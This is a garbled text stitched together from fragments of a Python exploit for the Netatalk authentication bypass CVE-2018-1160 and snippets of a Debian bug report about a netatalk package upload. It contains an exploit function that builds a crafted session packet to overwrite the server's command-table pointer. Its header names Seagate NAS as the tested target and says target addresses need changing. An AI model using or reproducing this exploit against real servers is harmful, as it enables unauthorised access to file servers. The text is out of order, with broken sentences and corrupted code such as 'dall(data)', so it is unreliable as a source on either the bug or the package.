

DEBIAN NETATALK PATCH
# Overwrites the commands pointer
# with the base of the preauth_switch
#
def do_exploit(sock):
    print " Sending exploit to overwrite preauth_switch data."
    data = '\x00\x04\x00\x01\x00\x00\x00\x00'
    data += '\x00\x00\x00\x1a\x00\x00\x00\x00'
    data += '\x01' # attnquant in open sess
    data += '\x18' # attnquant size
    data += '\xad\xaa\xaa\xba' # overwrites attn_quantum (on purpose)
    data += '\xef\xbe\xad\xde' # overwrites datasize
    data += '\xfe\xca\x1d\xc0' # overwrites server_quantum
    data += '\xce\xfa\xed\xfe' # overwrites the server id and client id
    data += preauth_switch_base # overwrite the commands ptr
    dall(data)

    # don't really care about the response
    resp = sock.recv(1024)
    return


#
# Sends a request to the server.

Package: netatalk
Version: 2.1.4-1
Severity: normal
Tags: patch pending

Dear maintainer, I've prepared an NMU for netatalk (versioned as 2.1.4-1.1) and uploaded it to DELAYED/5.

Sets the maximum number of clients that can simultaneously.


# The addresses below will need to be changed
# for a different target.
DEBIAN NETATALK SOFTWARE
PACKETSTORM:150891

#
# Exploit Title: Netatalk Authentication Bypass
# Date:
# Exploit Author: Jacob Baines
# Vendor Homepage:
# Software Link:
# Version: Before 3.1.12
# Tested on: Seagate NAS OS (x86_64)
# CVE : CVE-2018-1160
# Advisory:
#
import argparse
import socket
import struct
import sys

# Known addresses:
# This exploit was written against a Netatalk compiled for an
# x86_64 Seagate NAS.
